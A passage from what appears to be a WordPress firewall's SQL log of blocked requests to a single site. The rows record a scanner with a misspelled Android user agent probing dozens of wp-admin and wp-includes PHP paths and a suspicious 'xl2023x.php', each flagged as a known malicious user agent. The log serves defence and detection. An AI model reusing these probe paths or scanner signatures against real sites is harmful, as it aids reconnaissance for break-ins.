User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9FbmNsb3N1cmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134310,1700049175.871230,1700049175.860500,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xl2023x.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsMjAyM3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133582,1699888546.690562,1699888546.681300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/plugin.php','http://eckankar-colorado.org/wp-includes/plugin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BsdWdpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133329,1699888643.385912,1699888643.377000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/options.php','http://eckankar-colorado.org/wp-admin/includes/options.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL29wdGlvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133317,1699888647.570869,1699888647.555400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/translation-install.php','http://eckankar-colorado.org/wp-admin/includes/translation-install.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3RyYW5zbGF0aW9uLWluc3RhbGwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133316,1699888647.902456,1699888647.893600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/update-core.php','http://eckankar-colorado.org/wp-admin/includes/update-core.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3VwZGF0ZS1jb3JlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133314,1699888648.601772,1699888648.592900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/upgrade.php','http://eckankar-colorado.org/wp-admin/includes/upgrade.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3VwZ3JhZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133282,1699888660.095042,1699888660.085800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-admin/includes/','http://eckankar-colorado.org/wordpress/wp-admin/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133414,1699888613.017737,1699888613.008900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/bookmark.php','http://eckankar-colorado.org/wp-admin/includes/bookmark.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2Jvb2ttYXJrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133395,1699888620.562239,1699888620.552900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-theme-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-theme-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXRoZW1lLXVwZ3JhZGVyLXNraW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133413,1699888613.381209,1699888613.372000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-automatic-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-automatic-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWF1dG9tYXRpYy11cGdyYWRlci1za2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133347,1699888637.219372,1699888637.191900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/deprecated.php','http://eckankar-colorado.org/wp-admin/includes/deprecated.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2RlcHJlY2F0ZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133334,1699888641.696999,1699888641.686000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/ms-deprecated.php','http://eckankar-colorado.org/wp-admin/includes/ms-deprecated.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21zLWRlcHJlY2F0ZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133335,1699888641.364109,1699888641.354700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/ms-admin-filters.php','http://eckankar-colorado.org/wp-admin/includes/ms-admin-filters.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21zLWFkbWluLWZpbHRlcnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133338,1699888640.366016,1699888640.356600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/menu.php','http://eckankar-colorado.org/wp-admin/includes/menu.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21lbnUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133339,1699888640.032393,1699888640.022900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/media.php','http://eckankar-colorado.org/wp-admin/includes/media.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21lZGlhLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133336,1699888641.029336,1699888641.020500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/misc.php','http://eckankar-colorado.org/wp-admin/includes/misc.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21pc2MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133337,1699888640.698221,1699888640.689400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/meta-boxes.php','http://eckankar-colorado.org/wp-admin/includes/meta-boxes.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21ldGEtYm94ZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133412,1699888613.720889,1699888613.712000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-bulk-plugin-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-bulk-plugin-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWJ1bGstcGx1Z2luLXVwZ3JhZGVyLXNraW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133398,1699888619.368600,1699888619.353700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-plugin-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-plugin-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXBsdWdpbi11cGdyYWRlci1za2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133367,1699888630.176509,1699888630.167700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-posts-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-posts-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXBvc3RzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133368,1699888629.842447,1699888629.833500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-post-comments-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-post-comments-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXBvc3QtY29tbWVudHMtbGlzdC10YWJsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133411,1699888614.071666,1699888614.050000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-bulk-theme-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-bulk-theme-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWJ1bGstdGhlbWUtdXBncmFkZXItc2tpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133409,1699888614.937653,1699888614.922800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-core-upgrader.php','http://eckankar-colorado.org/wp-admin/includes/class-core-upgrader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWNvcmUtdXBncmFkZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133410,1699888614.421417,1699888614.412500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-bulk-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-bulk-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWJ1bGstdXBncmFkZXItc2tpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133408,1699888615.280911,1699888615.272000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-custom-background.php','http://eckankar-colorado.org/wp-admin/includes/class-custom-background.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 